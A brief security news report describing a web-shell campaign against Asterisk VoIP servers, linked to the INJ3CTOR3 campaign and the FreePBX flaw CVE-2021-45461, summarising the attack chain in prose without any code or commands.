An attack campaign targeted VoIP Phones using Digium’s software to drop a web shell on their servers. This web shell has been designed to exfiltrate data by downloading and executing additional payloads.
Reports stated that the malware first installs multilayer obfuscated PHP backdoors to the web server’s file system. It then downloads new payloads for execution, and schedules recurring tasks to re-infect the host system.
This irregular activity is said to first commence in mid December 2021. It targets, Asterisks, which is a widely used software implementation of a private-branch exchange (PBX). It runs on the open-source Elastix Unified Communications Server.
Reports stated that the intrusions are similar to the INJ3CTOR3 campaign that was disclosed by Check Point, an Israeli cyber security firm in November 2020. This implies the possibility of resurgence of the previous attacks.
The sudden surge coincides with the public disclosure of December 2021 of a now-patched remote code execution flaw in FreePBX. It was a web based open source GUI that controlled and managed Asterisk. The issue is rated 9.8 out of 10 for severity and is tracked as CVE-2021-45461.
The attack first retrieves an initial dropper shell script from a remote server. This in turn orchestrates the shell to install the PHP web shell in different locations in the file system. Additionally it also creates two root user accounts to maintain remote access.
Furthermore a schedule task is created which runs every minute and runs a remote copy of the shell script from the attacker-controlled domain for execution.
The malware also facilitates running arbitrary commands, allows the hackers to take control of the system, steal information, and maintain a backdoor to the compromised hosts.
Researchers reported that this is a common approach that malicious actors undertake to launch exploits or run commands remotely.
